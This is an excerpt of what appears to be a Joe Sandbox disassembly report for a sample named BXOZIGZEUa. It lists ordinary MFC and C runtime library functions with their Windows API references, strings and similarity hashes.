Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Throwstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 2513498551-3145022300
Opcode ID: a3098c54ae74af654b1121707ae001855633429a03f93a6bafff14ed59be4b5c
Instruction ID: b1fb5adf81e5397d0be18dbe076b67a67e15c4301565ed9f600e3ed13f88b3e5
Opcode Fuzzy Hash: a3098c54ae74af654b1121707ae001855633429a03f93a6bafff14ed59be4b5c
Instruction Fuzzy Hash: 4131DF3580020A9FDF24DF64C995BAE77B4FB05328F52066BE426A73D1DB346D04CB91

Function 004D6960 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004D698C
std::_Lockit::_Lockit.LIBCPMT ref: 004D69AF
std::bad_exception::bad_exception.LIBCMT ref: 004D6A30
__CxxThrowException@8.LIBCMT ref: 004D6A3E
std::_Lockit::_Lockit.LIBCPMT ref: 004D6A51

Strings

bad cast, xrefs: 004D6A28

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Throwstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 2513498551-3145022300
Opcode ID: ded14a1cbc6c693a28a01a37a025cc13ea666c006577be1eefbea97136ebced8
Instruction ID: c81e39db27d27d253f4f1524f34dc484b7ca0977107661a914f8f8b39eb49773
Opcode Fuzzy Hash: ded14a1cbc6c693a28a01a37a025cc13ea666c006577be1eefbea97136ebced8
Instruction Fuzzy Hash: 4831FF719002068FCB24DF64C895BAFB7B4FB06320F12421BE4A6B7391DB34AD00CB95

Function 004D6310 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004D6328

Part of subcall function 005E858E: std::exception::exception.LIBCMT ref: 005E85A3
Part of subcall function 005E858E: __CxxThrowException@8.LIBCMT ref: 005E85B8
Part of subcall function 005E858E: std::exception::exception.LIBCMT ref: 005E85C9

std::_Xinvalid_argument.LIBCPMT ref: 004D6346
std::_Xinvalid_argument.LIBCPMT ref: 004D6361
_memmove.LIBCMT ref: 004D63C5

Strings

invalid string position, xrefs: 004D6323
string too long, xrefs: 004D6341, 004D635C

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: ac8dae6a3aa9405e9a024f7f75b6378f98687adc82f42c3c3c608be470624d81
Instruction ID: 2527ca54307cd054b837361b95be8d8f7878173d368be9deb23e8237d3f9cb85
Opcode Fuzzy Hash: ac8dae6a3aa9405e9a024f7f75b6378f98687adc82f42c3c3c608be470624d81
Instruction Fuzzy Hash: 3721E6313007015FC724DE6CE8A0A2AF7E6BB95710B214A2FF896CB781D775D8408764

Function 004D6010 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004D601F

Part of subcall function 005E858E: std::exception::exception.LIBCMT ref: 005E85A3
Part of subcall function 005E858E: __CxxThrowException@8.LIBCMT ref: 005E85B8
Part of subcall function 005E858E: std::exception::exception.LIBCMT ref: 005E85C9

std::_Xinvalid_argument.LIBCPMT ref: 004D6035
std::_Xinvalid_argument.LIBCPMT ref: 004D6050
_memmove.LIBCMT ref: 004D60B2

Strings

invalid string position, xrefs: 004D601A
string too long, xrefs: 004D6030, 004D604B

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: fb630cf44cda6ba097b75cca38aaac97dec87d0287985cbc73f6d5c125644abe
Instruction ID: be153347c01deede381d9918e7bbeecd4497d373db86e392e2f338fc0084b9ba
Opcode Fuzzy Hash: fb630cf44cda6ba097b75cca38aaac97dec87d0287985cbc73f6d5c125644abe
Instruction Fuzzy Hash: 022127303102105FD736DE6CD8A4A2EB7EAAF92700B51491FF482CB781CB65EC44C7A8

Function 004F104E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 004F06C8: IsIconic.USER32(?), ref: 004F06E8

GetWindowRect.USER32(?,?), ref: 004F10C6

Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E012C
Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E0139

Part of subcall function 004F0CBE: __EH_prolog3_GS.LIBCMT ref: 004F0CC8
Part of subcall function 004F0CBE: GetWindowRect.USER32(?,?), ref: 004F0D17
Part of subcall function 004F0CBE: OffsetRect.USER32(?,?,?), ref: 004F0D2D
Part of subcall function 004F0CBE: CreateCompatibleDC.GDI32(?), ref: 004F0D9E
Part of subcall function 004F0CBE: SelectObject.GDI32(?,?), ref: 004F0DBE

GetModuleHandleW.KERNEL32(DWMAPI), ref: 004F10FE
GetProcAddress.KERNEL32(00000000,DwmSetIconicLivePreviewBitmap), ref: 004F110E
DeleteObject.GDI32(00000000), ref: 004F1125

Strings

DWMAPI, xrefs: 004F10F9
DwmSetIconicLivePreviewBitmap, xrefs: 004F1108

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$ClientObjectScreenWindow$AddressCompatibleCreateDeleteH_prolog3_HandleIconicModuleOffsetProcSelect
String ID: DWMAPI$DwmSetIconicLivePreviewBitmap
API String ID: 3205686482-239049650
Opcode ID: d89b3d21d03bf2c22720cb660be54d1af21e3d48c0fbff0666d05fc65324ee64
Instruction ID: fbf01b2cbafaa89f3bd6c4d71202782531a73e8e444d075726f05440e21e450d
Opcode Fuzzy Hash: d89b3d21d03bf2c22720cb660be54d1af21e3d48c0fbff0666d05fc65324ee64
Instruction Fuzzy Hash: 8B314F71A00209DF8B04DFA9D9858BFFBF9FF98704710456EE212E3261DA786941CB54

Function 00537644 Relevance: 10.6, APIs: 7, Instructions: 90windowCOMMON

Download Yara Rule

APIs

ReleaseCapture.USER32 ref: 00537674
GetCursorPos.USER32(?), ref: 00537696
GetSystemMetrics.USER32(00000044), ref: 005376B6
GetCapture.USER32 ref: 005376BE
ReleaseCapture.USER32 ref: 005376F0
GetParent.USER32(?), ref: 0053770D
SendMessageW.USER32(?,?,?,00000000), ref: 00537731

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Capture$Release$CursorMessageMetricsParentSendSystem
String ID:
API String ID: 237134002-0
Opcode ID: b4c7590d6cc20f58feb1008f5747a3bdc414ca7a07c4326e20350769fbe03623
Instruction ID: 93f5d166a242fdc6c6f85cdbf5a46a38cec3968b97044065d3ccebfb99c66233
Opcode Fuzzy Hash: b4c7590d6cc20f58feb1008f5747a3bdc414ca7a07c4326e20350769fbe03623
Instruction Fuzzy Hash: 80319AB1900619EFCF21AFA8DC889AEBFB5FF48341F10492EF41686260DB349950DB54

Function 005B8A42 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005B8A49

Part of subcall function 005A7DE9: __EH_prolog3.LIBCMT ref: 005A7DF0

Part of subcall function 005C9306: __EH_prolog3.LIBCMT ref: 005C930D

Strings

dF`, xrefs: 005B8ACD
dI`, xrefs: 005B8B16
dI`, xrefs: 005B8A9F
X*b, xrefs: 005B8B86
G`, xrefs: 005B8AE7

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3
String ID: X*b$dF`$dI`$dI`$G`
API String ID: 431132790-2979339354
Opcode ID: 6a22bc849f15044b398e3e5793a7f4f287322e2b90459a85bbc747175957808f
Instruction ID: 6fec9dc0ca425a784dfadc4f4a92c70e521b7a40b7d98126d8895a7aff1e7c04
Opcode Fuzzy Hash: 6a22bc849f15044b398e3e5793a7f4f287322e2b90459a85bbc747175957808f
Instruction Fuzzy Hash: EC418EB0405B84DFCB61EF75C1557DBBBE4AF25308F10485EA6AE57282DF742608CB1A

Function 005104A5 Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

LockWindowUpdate.USER32(00000000,00000000,?,?,?,0058571B,00000000), ref: 005104E6
ValidateRect.USER32(?,00000000,?,?,0058571B,00000000), ref: 0051051B
UpdateWindow.USER32(?), ref: 00510520
LockWindowUpdate.USER32(00000000,?,0058571B,00000000), ref: 00510533
ValidateRect.USER32(?,00000000,?,?,0058571B,00000000), ref: 0051055A
UpdateWindow.USER32(?), ref: 0051055F
LockWindowUpdate.USER32(00000000,?,0058571B,00000000), ref: 00510572

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: UpdateWindow$Lock$RectValidate
String ID:
API String ID: 797752328-0
Opcode ID: e516c8889273a7014ed52f79dd6cdbf36ef049e6c9d4d3ec61fcd4ec1bb16fcb
Instruction ID: cbed3fb68b446fb4de78dfcd0e3205ec3fd2b05a91312718f0f4553b6581c9d5
Opcode Fuzzy Hash: e516c8889273a7014ed52f79dd6cdbf36ef049e6c9d4d3ec61fcd4ec1bb16fcb
Instruction Fuzzy Hash: BF217132600100EBEB255F54D884BB9BBB2FF44750F2A5119E549AB6A0D7B1ACD0EF90

Function 00518463 Relevance: 10.6, APIs: 7, Instructions: 80windowthreadCOMMON

Download Yara Rule

APIs

SetFocus.USER32(00000000,00000000), ref: 00518483
GetParent.USER32(?), ref: 00518491
GetWindowThreadProcessId.USER32(?,?), ref: 005184AC
GetCurrentProcessId.KERNEL32 ref: 005184B2
GetActiveWindow.USER32 ref: 00518505
SendMessageW.USER32(?,00000006,00000001,00000000), ref: 00518519
SendMessageW.USER32(?,00000086,00000001,00000000), ref: 0051852D

Part of subcall function 004ECD97: EnableWindow.USER32(?,?), ref: 004ECDA8

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
String ID:
API String ID: 2169720751-0
Opcode ID: 610d2da1802b0c18f85b89e00dbc9d3faef3792081acf75a91444fd186fe4c3b
Instruction ID: a1ccb50598dc7a1b84c55efe7e11b5996e19704a824695c2d411735f8f376d09
Opcode Fuzzy Hash: 610d2da1802b0c18f85b89e00dbc9d3faef3792081acf75a91444fd186fe4c3b
Instruction Fuzzy Hash: AE21D131200704ABEB31AF25DCC8BBA7FA6FB54754F254918F586C61A0DFB5A8C08B50

Function 00522AAD Relevance: 10.6, APIs: 7, Instructions: 80windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00522AC5
SendMessageW.USER32(?,0000020A,?,?), ref: 00522AF7
GetFocus.USER32 ref: 00522B0B
IsChild.USER32(?,?), ref: 00522B2D
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00522B5E
IsWindowVisible.USER32(?), ref: 00522B73
SendMessageW.USER32(?,0000020A,?,?), ref: 00522B91

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSend$Window$ChildFocusVisible
String ID:
API String ID: 1252167185-0
Opcode ID: 4501784149dd81b8705431fb914b520c469a7953fee95f5cf223d07ef0d9a22d
Instruction ID: be02cb2f01c674417ef5c07b4338d357859fc97fef3042a1cfa76488d88fd432
Opcode Fuzzy Hash: 4501784149dd81b8705431fb914b520c469a7953fee95f5cf223d07ef0d9a22d
Instruction Fuzzy Hash: 3A217C7A600222ABDB209F25EC44F367BA6FF0A701F064568F845DB1B0DB32EC00EB41

Function 004E41A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 004E41DF
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004E420A
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004E4235
RegCloseKey.ADVAPI32(?), ref: 004E4249
RegCloseKey.ADVAPI32(?), ref: 004E4253

Part of subcall function 004E17E4: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 004E17F6
Part of subcall function 004E17E4: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 004E1806

Strings

software, xrefs: 004E41C1

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CloseCreate$AddressHandleModuleOpenProc
String ID: software
API String ID: 550756860-2010147023
Opcode ID: 60d468f10dace7fa5c25a695e479b30679ce0229670945f012316b75c5e41820
Instruction ID: a9b6f2e0b48fcc69fae1e00207791962e432719219ff7065f4d76a399a43df0f
Opcode Fuzzy Hash: 60d468f10dace7fa5c25a695e479b30679ce0229670945f012316b75c5e41820
Instruction Fuzzy Hash: F8213A71900088FB8B219BD6CC88CBFBF7DEFD5741B64009BF605A2111DB355A45DB65

Function 005024CE Relevance: 10.6, APIs: 7, Instructions: 76windowCOMMON

Download Yara Rule

APIs

FillRect.USER32(?,?), ref: 005024F0
InflateRect.USER32(?,000000FF,000000FF), ref: 005024FE
PatBlt.GDI32(?,?,?,00000001,?,005A0049), ref: 0050252A
PatBlt.GDI32(?,?,?,?,00000001,005A0049), ref: 0050253F
PatBlt.GDI32(?,00000000,?,00000001,?,005A0049), ref: 00502554
PatBlt.GDI32(?,?,?,00000000,00000001,005A0049), ref: 0050256A
FillRect.USER32(?,?), ref: 0050257F

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Fill$Inflate
String ID:
API String ID: 2224923502-0
Opcode ID: 9a78c4586fd4c81e537e87870b26c4880230e11ca469cfc92e10b429de65db9e
Instruction ID: 734029f621701f5084b12adbc99cac142a48e194e9ab6188c58d7843fda2f9e0
Opcode Fuzzy Hash: 9a78c4586fd4c81e537e87870b26c4880230e11ca469cfc92e10b429de65db9e
Instruction Fuzzy Hash: 8521FA75100119FFDF01CF58DD89EAA7FAAFB49720F048115BD149A2A0C771E964DF60

Function 004E6F6B Relevance: 10.6, APIs: 7, Instructions: 73COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004E6F8D
GetWindowRect.USER32(?,?), ref: 004E6FB1
ScreenToClient.USER32(?,?), ref: 004E6FC4
ScreenToClient.USER32(?,?), ref: 004E6FCD
EqualRect.USER32(?,?), ref: 004E6FD4
DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 004E6FFE
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 004E7008

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$ClientRectScreen$DeferEqualParent
String ID:
API String ID: 443303494-0
Opcode ID: 6f75f59bcf3e0e73d424accb873c6f5141ea14b78f30c2d4c0fe2ab0611f9855
Instruction ID: 5c609c788672388aae99663a84e1b1c74e5f52cd00f5a3db011217d71a1e1b2a
Opcode Fuzzy Hash: 6f75f59bcf3e0e73d424accb873c6f5141ea14b78f30c2d4c0fe2ab0611f9855
Instruction Fuzzy Hash: B321217590020AAFDB10DFA5DC84DBFBBB9FF98311B20842AE915E3250DB34A904DF60

Function 0051EFC0 Relevance: 10.6, APIs: 7, Instructions: 73windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000407,00000000,?), ref: 0051EFEC
IsRectEmpty.USER32(?), ref: 0051F00B
IsRectEmpty.USER32(?), ref: 0051F018
GetCursorPos.USER32(00000000), ref: 0051F02A
ScreenToClient.USER32(?,00000000), ref: 0051F037
PtInRect.USER32(?,00000000,00000000), ref: 0051F04A
PtInRect.USER32(?,00000000,00000000), ref: 0051F05D

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Empty$ClientCursorMessageScreenSend
String ID:
API String ID: 703117857-0
Opcode ID: 853c8f7a2b210959e6a2240baec4e8266fd26be3efac5dd9b64a099d45e69993
Instruction ID: aca0f21b90572743718de1640e46b563c546ef330466ac341b683173c888554c
Opcode Fuzzy Hash: 853c8f7a2b210959e6a2240baec4e8266fd26be3efac5dd9b64a099d45e69993
Instruction Fuzzy Hash: 9421A17250020ABFEF20ABA0CC48EEE7FB9FF48354F000564E54692161DB35EA85EB20

Function 004E1054 Relevance: 10.6, APIs: 7, Instructions: 73COMMON

Download Yara Rule

APIs

RealChildWindowFromPoint.USER32(?,?,?), ref: 004E1079
ClientToScreen.USER32(?,?), ref: 004E1098
GetWindow.USER32(?,00000005), ref: 004E10FB

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$ChildClientFromPointRealScreen
String ID:
API String ID: 2518355518-0
